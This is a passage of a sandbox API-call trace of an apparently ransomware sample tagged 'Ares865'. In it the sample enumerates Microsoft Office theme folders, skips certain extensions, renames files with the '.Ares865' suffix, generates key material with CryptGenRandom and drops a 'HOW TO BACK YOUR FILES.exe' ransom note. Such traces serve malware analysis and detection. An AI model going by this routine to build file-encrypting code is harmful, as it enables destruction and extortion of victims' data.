lstrlenW (lpString=".dll") returned 4 [0073.741] lstrcmpiW (lpString1="Technic.xml", lpString2=".dll") returned 1 [0073.741] lstrlenW (lpString=".lnk") returned 4 [0073.741] lstrcmpiW (lpString1="Technic.xml", lpString2=".lnk") returned 1 [0073.741] lstrlenW (lpString=".ini") returned 4 [0073.741] lstrcmpiW (lpString1="Technic.xml", lpString2=".ini") returned 1 [0073.741] lstrlenW (lpString=".sys") returned 4 [0073.741] lstrcmpiW (lpString1="Technic.xml", lpString2=".sys") returned 1 [0073.741] lstrlenW (lpString="Technic.xml") returned 11 [0073.741] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml.Ares865") returned 84 [0073.741] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\technic.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\technic.xml.ares865"), dwFlags=0x1) returned 1 [0073.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\technic.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.742] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3603) returned 1 [0073.742] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.743] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.743] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.745] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.745] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.745] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.746] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa69f900, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x6187c750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa69f900, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xeff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Thatch.xml", cAlternateFileName="")) returned 1 [0073.746] lstrcmpiW (lpString1="Thatch.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.746] lstrcmpiW (lpString1="Thatch.xml", lpString2="aoldtz.exe") returned 1 [0073.746] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Thatch.xml" | out: lpString1="Thatch.xml") returned="Thatch.xml" [0073.746] lstrlenW (lpString="Thatch.xml") returned 10 [0073.746] lstrlenW (lpString="Ares865") returned 7 [0073.746] lstrcmpiW (lpString1="tch.xml", lpString2="Ares865") returned 1 [0073.746] lstrlenW (lpString=".dll") returned 4 [0073.746] lstrcmpiW (lpString1="Thatch.xml", lpString2=".dll") returned 1 [0073.746] lstrlenW (lpString=".lnk") returned 4 [0073.746] lstrcmpiW (lpString1="Thatch.xml", lpString2=".lnk") returned 1 [0073.746] lstrlenW (lpString=".ini") returned 4 [0073.746] lstrcmpiW (lpString1="Thatch.xml", lpString2=".ini") returned 1 [0073.746] lstrlenW (lpString=".sys") returned 4 [0073.746] lstrcmpiW (lpString1="Thatch.xml", lpString2=".sys") returned 1 [0073.746] lstrlenW (lpString="Thatch.xml") returned 10 [0073.746] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml.Ares865") returned 83 [0073.746] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\thatch.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\thatch.xml.ares865"), dwFlags=0x1) returned 1 [0073.747] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\thatch.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.747] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3839) returned 1 [0073.748] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.748] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.748] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.752] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.753] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.753] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.753] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd4d0a00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfd4d0a00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Trek.xml", cAlternateFileName="")) returned 1 [0073.753] lstrcmpiW (lpString1="Trek.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.753] lstrcmpiW (lpString1="Trek.xml", lpString2="aoldtz.exe") returned 1 [0073.753] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Trek.xml" | out: lpString1="Trek.xml") returned="Trek.xml" [0073.754] lstrlenW (lpString="Trek.xml") returned 8 [0073.754] lstrlenW (lpString="Ares865") returned 7 [0073.754] lstrcmpiW (lpString1="rek.xml", lpString2="Ares865") returned 1 [0073.754] lstrlenW (lpString=".dll") returned 4 [0073.754] lstrcmpiW (lpString1="Trek.xml", lpString2=".dll") returned 1 [0073.754] lstrlenW (lpString=".lnk") returned 4 [0073.754] lstrcmpiW (lpString1="Trek.xml", lpString2=".lnk") returned 1 [0073.754] lstrlenW (lpString=".ini") returned 4 [0073.754] lstrcmpiW (lpString1="Trek.xml", lpString2=".ini") returned 1 [0073.754] lstrlenW (lpString=".sys") returned 4 [0073.754] lstrcmpiW (lpString1="Trek.xml", lpString2=".sys") returned 1 [0073.754] lstrlenW (lpString="Trek.xml") returned 8 [0073.754] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml.Ares865") returned 81 [0073.754] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\trek.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\trek.xml.ares865"), dwFlags=0x1) returned 1 [0073.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\trek.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.755] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3616) returned 1 [0073.755] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.756] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.756] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.758] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.759] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.759] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.759] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe7e3700, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfe7e3700, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe19, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Urban.xml", cAlternateFileName="")) returned 1 [0073.759] lstrcmpiW (lpString1="Urban.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.759] lstrcmpiW (lpString1="Urban.xml", lpString2="aoldtz.exe") returned 1 [0073.759] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Urban.xml" | out: lpString1="Urban.xml") returned="Urban.xml" [0073.760] lstrlenW (lpString="Urban.xml") returned 9 [0073.760] lstrlenW (lpString="Ares865") returned 7 [0073.760] lstrcmpiW (lpString1="ban.xml", lpString2="Ares865") returned 1 [0073.760] lstrlenW (lpString=".dll") returned 4 [0073.760] lstrcmpiW (lpString1="Urban.xml", lpString2=".dll") returned 1 [0073.760] lstrlenW (lpString=".lnk") returned 4 [0073.760] lstrcmpiW (lpString1="Urban.xml", lpString2=".lnk") returned 1 [0073.760] lstrlenW (lpString=".ini") returned 4 [0073.760] lstrcmpiW (lpString1="Urban.xml", lpString2=".ini") returned 1 [0073.760] lstrlenW (lpString=".sys") returned 4 [0073.760] lstrcmpiW (lpString1="Urban.xml", lpString2=".sys") returned 1 [0073.760] lstrlenW (lpString="Urban.xml") returned 9 [0073.760] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml.Ares865") returned 82 [0073.760] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\urban.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\urban.xml.ares865"), dwFlags=0x1) returned 1 [0073.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Urban.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\urban.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.762] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3609) returned 1 [0073.762] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.763] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.763] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.765] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.765] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.765] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.766] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffaf6400, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xffaf6400, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Verve.xml", cAlternateFileName="")) returned 1 [0073.766] lstrcmpiW (lpString1="Verve.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.766] lstrcmpiW (lpString1="Verve.xml", lpString2="aoldtz.exe") returned 1 [0073.766] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Verve.xml" | out: lpString1="Verve.xml") returned="Verve.xml" [0073.766] lstrlenW (lpString="Verve.xml") returned 9 [0073.766] lstrlenW (lpString="Ares865") returned 7 [0073.766] lstrcmpiW (lpString1="rve.xml", lpString2="Ares865") returned 1 [0073.766] lstrlenW (lpString=".dll") returned 4 [0073.766] lstrcmpiW (lpString1="Verve.xml", lpString2=".dll") returned 1 [0073.766] lstrlenW (lpString=".lnk") returned 4 [0073.766] lstrcmpiW (lpString1="Verve.xml", lpString2=".lnk") returned 1 [0073.766] lstrlenW (lpString=".ini") returned 4 [0073.766] lstrcmpiW (lpString1="Verve.xml", lpString2=".ini") returned 1 [0073.766] lstrlenW (lpString=".sys") returned 4 [0073.766] lstrcmpiW (lpString1="Verve.xml", lpString2=".sys") returned 1 [0073.766] lstrlenW (lpString="Verve.xml") returned 9 [0073.767] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml.Ares865") returned 82 [0073.767] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\verve.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\verve.xml.ares865"), dwFlags=0x1) returned 1 [0073.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Verve.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\verve.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.767] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3604) returned 1 [0073.768] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.768] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.768] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.770] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.771] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.771] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.772] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9b2600, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9b2600, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Waveform.xml", cAlternateFileName="")) returned 1 [0073.772] lstrcmpiW (lpString1="Waveform.xml", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0073.772] lstrcmpiW (lpString1="Waveform.xml", lpString2="aoldtz.exe") returned 1 [0073.772] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="Waveform.xml" | out: lpString1="Waveform.xml") returned="Waveform.xml" [0073.772] lstrlenW (lpString="Waveform.xml") returned 12 [0073.772] lstrlenW (lpString="Ares865") returned 7 [0073.772] lstrcmpiW (lpString1="orm.xml", lpString2="Ares865") returned 1 [0073.772] lstrlenW (lpString=".dll") returned 4 [0073.772] lstrcmpiW (lpString1="Waveform.xml", lpString2=".dll") returned 1 [0073.772] lstrlenW (lpString=".lnk") returned 4 [0073.772] lstrcmpiW (lpString1="Waveform.xml", lpString2=".lnk") returned 1 [0073.772] lstrlenW (lpString=".ini") returned 4 [0073.772] lstrcmpiW (lpString1="Waveform.xml", lpString2=".ini") returned 1 [0073.772] lstrlenW (lpString=".sys") returned 4 [0073.772] lstrcmpiW (lpString1="Waveform.xml", lpString2=".sys") returned 1 [0073.772] lstrlenW (lpString="Waveform.xml") returned 12 [0073.772] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml.Ares865") returned 85 [0073.772] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\waveform.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\waveform.xml.ares865"), dwFlags=0x1) returned 1 [0073.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Waveform.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\waveform.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.773] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3577) returned 1 [0073.773] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.774] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.774] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.776] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.777] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.777] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.777] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9b2600, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9b2600, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Waveform.xml", cAlternateFileName="")) returned 0 [0073.777] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0073.777] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2e7c10 [0073.777] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" [0073.777] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0073.778] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0073.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 66 [0073.778] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: lpString1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" [0073.778] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0073.778] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\how to back your files.exe"), bFailIfExists=1) returned 1 [0073.783] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0073.784] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d7a79a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d7a79a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0073.784] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.784] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0073.784] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5d7a79a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d7a79a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.785] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0073.785] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0073.785] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Adjacency.eftx" | out: lpString1="Adjacency.eftx") returned="Adjacency.eftx" [0073.786] lstrlenW (lpString="Adjacency.eftx") returned 14 [0073.786] lstrlenW (lpString="Ares865") returned 7 [0073.786] lstrcmpiW (lpString1="cy.eftx", lpString2="Ares865") returned 1 [0073.786] lstrlenW (lpString=".dll") returned 4 [0073.786] lstrcmpiW (lpString1="Adjacency.eftx", lpString2=".dll") returned 1 [0073.786] lstrlenW (lpString=".lnk") returned 4 [0073.786] lstrcmpiW (lpString1="Adjacency.eftx", lpString2=".lnk") returned 1 [0073.786] lstrlenW (lpString=".ini") returned 4 [0073.786] lstrcmpiW (lpString1="Adjacency.eftx", lpString2=".ini") returned 1 [0073.786] lstrlenW (lpString=".sys") returned 4 [0073.786] lstrcmpiW (lpString1="Adjacency.eftx", lpString2=".sys") returned 1 [0073.786] lstrlenW (lpString="Adjacency.eftx") returned 14 [0073.786] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Angles.eftx" | out: lpString1="Angles.eftx") returned="Angles.eftx" [0073.786] lstrlenW (lpString="Angles.eftx") returned 11 [0073.786] lstrlenW (lpString="Ares865") returned 7 [0073.786] lstrcmpiW (lpString1="es.eftx", lpString2="Ares865") returned 1 [0073.786] lstrlenW (lpString=".dll") returned 4 [0073.786] lstrcmpiW (lpString1="Angles.eftx", lpString2=".dll") returned 1 [0073.786] lstrlenW (lpString=".lnk") returned 4 [0073.786] lstrcmpiW (lpString1="Angles.eftx", lpString2=".lnk") returned 1 [0073.786] lstrlenW (lpString=".ini") returned 4 [0073.786] lstrcmpiW (lpString1="Angles.eftx", lpString2=".ini") returned 1 [0073.786] lstrlenW (lpString=".sys") returned 4 [0073.786] lstrcmpiW (lpString1="Angles.eftx", lpString2=".sys") returned 1 [0073.786] lstrlenW (lpString="Angles.eftx") returned 11 [0073.786] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Apex.eftx" | out: lpString1="Apex.eftx") returned="Apex.eftx" [0073.786] lstrlenW (lpString="Apex.eftx") returned 9 [0073.786] lstrlenW (lpString="Ares865") returned 7 [0073.786] lstrcmpiW (lpString1="ex.eftx", lpString2="Ares865") returned 1 [0073.786] lstrlenW (lpString=".dll") returned 4 [0073.786] lstrcmpiW (lpString1="Apex.eftx", lpString2=".dll") returned 1 [0073.786] lstrlenW (lpString=".lnk") returned 4 [0073.787] lstrcmpiW (lpString1="Apex.eftx", lpString2=".lnk") returned 1 [0073.787] lstrlenW (lpString=".ini") returned 4 [0073.787] lstrcmpiW (lpString1="Apex.eftx", lpString2=".ini") returned 1 [0073.787] lstrlenW (lpString=".sys") returned 4 [0073.787] lstrcmpiW (lpString1="Apex.eftx", lpString2=".sys") returned 1 [0073.787] lstrlenW (lpString="Apex.eftx") returned 9 [0073.787] lstrcpyW (in: lpString1=0x2e2e8e6, lpString2="Apothecary.eftx" | out: lpString1="Apothecary.eftx") returned="Apothecary.eftx" [0073.787] lstrlenW (lpString="Apothecary.eftx") returned 15 [0073.787] lstrlenW (lpString="Ares865") returned 7 [0073.787] lstrcmpiW (lpString1="ry.eftx", lpString2="Ares865") returned 1 [0073.787] lstrlenW (lpString=".dll") returned 4 [0073.787] lstrcmpiW (lpString1="Apothecary.eftx", lpString2=".dll") returned 1 [0073.787] lstrlenW (lpString=".lnk") returned 4 [0073.787] lstrcmpiW (lpString1="Apothecary.eftx", lpString2=".lnk") returned 1 [0073.787] lstrlenW (lpString=".ini") returned 4 [0073.787] 